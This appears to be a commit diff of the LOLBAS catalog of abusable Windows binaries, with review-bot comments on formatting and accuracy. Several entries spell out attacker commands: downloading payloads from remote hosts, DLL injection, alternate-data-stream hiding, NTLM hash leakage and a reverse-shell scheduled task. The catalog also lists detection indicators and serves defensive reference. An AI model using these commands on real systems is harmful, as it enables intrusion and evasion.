- Command: ie4uinit.exe -BaseSettings
Description: Executes commands from a specially prepared ie4uinit.inf file.

View File

@ -2,7 +2,7 @@
Name: Ieexec.exe
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server.

View File

@ -2,7 +2,7 @@
Name: Ilasm.exe
Description: used for compile c# code into dll or exe.
Author: Hai vaknin (lux)
Created: 17/03/2020
Created: 2020-03-17
Commands:
- Command: ilasm.exe C:\public\test.txt /exe
Description: Binary file used by .NET to compile c# code to .exe

View File

@ -2,7 +2,7 @@
Name: Infdefaultinstall.exe
Description: Binary used to perform installation based on content inside inf files
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.

View File

@ -2,7 +2,7 @@
Name: Installutil.exe
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.

View File

@ -2,7 +2,7 @@
Name: Jsc.exe
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
Author: 'Oddvar Moe'
Created: '2019-05-31'
Created: 2019-05-31
Commands:
- Command: jsc.exe scriptfile.js
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.

View File

@ -2,7 +2,7 @@
Name: Makecab.exe
Description: Binary to package existing files into a cabinet (.cab) file
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.

View File

@ -2,7 +2,7 @@
Name: Mavinject.exe
Description: Used by App-v in Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
Description: Inject evil.dll into a process with PID 3110.

View File

@ -2,7 +2,7 @@
Name: Microsoft.Workflow.Compiler.exe
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
Author: 'Conor Richard'
Created: '2018-10-22'
Created: 2018-10-22
Commands:
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.

View File

@ -2,7 +2,7 @@
Name: Mmc.exe
Description: Load snap-ins to locally and remotely manage Windows systems
Author: '@bohops'
Created: '2018-12-04'
Created: 2018-12-04
Commands:
- Command: mmc.exe -Embedding c:\path\to\test.msc
Description: Launch a 'backgrounded' MMC process and invoke a COM payload

View File

@ -2,7 +2,7 @@
Name: MpCmdRun.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
Author: 'Oddvar Moe'
Created: '09/03/2020'
Created: 2020-03-20
Commands:
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
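Review bot: `'09/03/2020'` becomes `2020-03-20`, which matches neither a day-first reading (9 March, `2020-03-09`) nor a month-first one (3 September, `2020-09-03`); this looks like a typo introduced during the conversion and should be checked against the file's history before merging.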

View File

@ -2,7 +2,7 @@
Name: Msbuild.exe
Description: Used to compile and execute code
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: msbuild.exe pshell.xml
Description: Build and execute a C# project stored in the target XML file.

View File

@ -2,7 +2,7 @@
Name: Msconfig.exe
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Msconfig.exe -5
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.

View File

@ -2,7 +2,7 @@
Name: Msdt.exe
Description: Microsoft diagnostics tool
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.

View File

@ -2,7 +2,7 @@
Name: Mshta.exe
Description: Used by Windows to execute html applications. (.hta)
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: mshta.exe evilfile.hta
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.

View File

@ -2,7 +2,7 @@
Name: Msiexec.exe
Description: Used by Windows to execute msi files
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: msiexec /quiet /i cmd.msi
Description: Installs the target .MSI file silently.

View File

@ -2,7 +2,7 @@
Name: Netsh.exe
Description: Netsh is a Windows tool used to manipulate network interface settings.
Author: 'Freddie Barr-Smith'
Created: '2019-12-24'
Created: 2019-12-24
Commands:
- Command: netsh.exe add helper C:\Users\User\file.dll
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called

View File

@ -2,7 +2,7 @@
Name: Odbcconf.exe
Description: Used in Windows for managing ODBC connections
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
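Review bot: the unchanged Description line says 'See the Playloads folder'; 'Playloads' looks like a typo for 'Payloads' and is worth fixing in the same file.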

View File

@ -0,0 +1,22 @@
---
Name: OfflineScannerShell.exe
Description: Windows Defender Offline Shell
Author: 'Elliot Killick'
Created: '2021-08-16'
Commands:
- Command: OfflineScannerShell
Description: Execute mpclient.dll library in the current working directory
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: Execute
Privileges: Administrator
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
Detection:
- IOC: OfflineScannerShell.exe should not be run on a normal workstation
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---
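Review bot: this new file is inconsistent with the rest of the commit in two places: Created is still quoted ('2021-08-16') while every other Created line is being unquoted, and it ends with a trailing '---' document marker that the template change in this same commit removes. MitreLink also uses the legacy https://attack.mitre.org/wiki/Technique/T1218/ form, whereas OneDriveStandaloneUpdater.yml below uses https://attack.mitre.org/techniques/T1105/; pick one form. On substance, the Description says the binary loads mpclient.dll from the current working directory, which is DLL side-loading, so consider whether T1574.002 fits better than T1218 for MitreID, and add a Resources link so readers can reproduce the sideload.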

View File

@ -0,0 +1,25 @@
---
Name: OneDriveStandaloneUpdater.exe
Description: OneDrive Standalone Updater
Author: 'Elliot Killick'
Created: '2021-08-22'
Commands:
- Command: OneDriveStandaloneUpdater
Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/techniques/T1105/
OperatingSystem: Windows 10
Full_Path:
- Path: '%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
Detection:
- IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL
- IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files
Resources:
- Link: https://github.com/LOLBAS-Project/LOLBAS/pull/153
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---
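Review bot: the three %localappdata% paths in this entry disagree. Full_Path puts the binary under %localappdata%\Microsoft\OneDrive\, but the Description's download location and the Detection log path are written under %localappdata%\OneDrive\ (StandaloneUpdater\PreSignInSettingsConfig.json and setup\logs\StandaloneUpdate_*.log). Please confirm the real directories so the log IOC points where those files actually live. Also, the Description is a single very long line, which the line-length rule in the new .yamllint will flag (as a warning only), and as in OfflineScannerShell.yml the Created value is still quoted and the file keeps the trailing '---'.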

View File

@ -2,7 +2,7 @@
Name: Pcalua.exe
Description: Program Compatibility Assistant
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: pcalua.exe -a calc.exe
Description: Open the target .EXE using the Program Compatibility Assistant.

View File

@ -2,7 +2,7 @@
Name: Pcwrun.exe
Description: Program Compatibility Wizard
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Pcwrun.exe c:\temp\beacon.exe
Description: Open the target .EXE file with the Program Compatibility Wizard.

View File

@ -2,7 +2,7 @@
Name: Pktmon.exe
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
Author: 'Derek Johnson'
Created: '2020-08-12'
Created: 2020-08-12
Commands:
- Command: pktmon.exe start --etw
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop

View File

@ -2,7 +2,7 @@
Name: Presentationhost.exe
Description: File is used for executing Browser applications
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Presentationhost.exe C:\temp\Evil.xbap
Description: Executes the target XAML Browser Application (XBAP) file

View File

@ -2,7 +2,7 @@
Name: Print.exe
Description: Used by Windows to send files to the printer
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.

View File

@ -0,0 +1,32 @@
---
Name: PrintBrm.exe
Description: Printer Migration Command-Line Tool
Author: 'Elliot Killick'
Created: '2021-06-21'
Commands:
- Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
Description: Create a ZIP file from a folder in a remote drive
Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/techniques/T1105/
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/techniques/T1096/
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe
Detection:
- IOC: PrintBrm.exe should not be run on a normal workstation
Resources:
- Link: https://twitter.com/elliotkillick/status/1404117015447670800
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---
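Review bot: the first command's Category is Download but its Usecase says 'Exfiltrate'; the command pulls a folder from a UNC share into a local ZIP, which is download/collection rather than exfiltration, so the Usecase wording should match the Category. The second command uses MitreID T1096, which ATT&CK has retired in favour of T1564.004 (Hide Artifacts: NTFS File Attributes); check which ID the project's other ADS entries use and align with them. Same consistency nits as the other new files: quoted Created value and trailing '---'.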

View File

@ -2,7 +2,7 @@
Name: Psr.exe
Description: Windows Problem Steps Recorder, used to record screen and clicks.
Author: Leon Rodenko
Created: '2020-06-27'
Created: 2020-06-27
Commands:
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.

View File

@ -2,7 +2,7 @@
Name: Rasautou.exe
Description: Windows Remote Access Dialer
Author: 'Tony Lambert'
Created: '2020-01-10'
Created: 2020-01-10
Commands:
- Command: rasautou -d powershell.dll -p powershell -a a -e e
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.

View File

@ -2,7 +2,7 @@
Name: Reg.exe
Description: Used to manipulate the registry
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.

View File

@ -2,7 +2,7 @@
Name: Regasm.exe
Description: Part of .NET
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.

View File

@ -2,7 +2,7 @@
Name: Regedit.exe
Description: Used by Windows to manipulate registry
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Description: Export the target Registry key to the specified .REG file.

View File

@ -2,7 +2,7 @@
Name: Regini.exe
Description: Used to manipulate the registry
Author: 'Oddvar Moe'
Created: '2020-07-03'
Created: 2020-07-03
Commands:
- Command: regini.exe newfile.txt:hidden.ini
Description: Write registry keys from data inside the Alternate data stream.

View File

@ -2,7 +2,7 @@
Name: Register-cimprovider.exe
Description: Used to register new wmi providers
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Register-cimprovider -path "C:\folder\evil.dll"
Description: Load the target .DLL.

View File

@ -2,7 +2,7 @@
Name: Regsvcs.exe
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.

View File

@ -2,7 +2,7 @@
Name: Regsvr32.exe
Description: Used by Windows to register dlls
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.

View File

@ -2,7 +2,7 @@
Name: Replace.exe
Description: Used to replace file with another file
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: replace.exe C:\Source\File.cab C:\Destination /A
Description: Copy file.cab to destination

View File

@ -2,7 +2,7 @@
Name: Rpcping.exe
Description: Used to verify rpc connection
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.

View File

@ -2,7 +2,7 @@
Name: Rundll32.exe
Description: Used by Windows to execute dll files
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: rundll32.exe AllTheThingsx64,EntryPoint
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.

View File

@ -2,7 +2,7 @@
Name: Runonce.exe
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Runonce.exe /AlternateShellStartup
Description: Executes a Run Once Task that has been configured in the registry
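Review bot: Description at the top of this file is empty (the same is true of Runscripthelper.yml below); a one-line description of what the binary is would bring these entries in line with the others, and the yamllint rules added in this commit will not catch an empty scalar, so it needs fixing by hand.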

View File

@ -2,7 +2,7 @@
Name: Runscripthelper.exe
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
Description: Execute the PowerShell script named test.txt

View File

@ -2,7 +2,7 @@
Name: Sc.exe
Description: Used by Windows to manage services
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
Description: Creates a new service and executes the file stored in the ADS.
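Review bot: unrelated to the date change, the unchanged sc create command line has a stray backslash before the ampersand (start= auto\ & sc start evilservice), so cmd.exe passes 'auto\' as the start value; it should be 'start= auto & sc start evilservice'. The binPath quoting is also inconsistent within the same line, doubling backslashes in \"c:\\ADS\\file.txt:cmd.exe\" but not in \"c:\ADS\works.txt\"; both paths should use the same convention.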

View File

@ -2,7 +2,7 @@
Name: Schtasks.exe
Description: Schedule periodic tasks
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
Description: Create a recurring task to execute every minute.

Some files were not shown because too many files have changed in this diff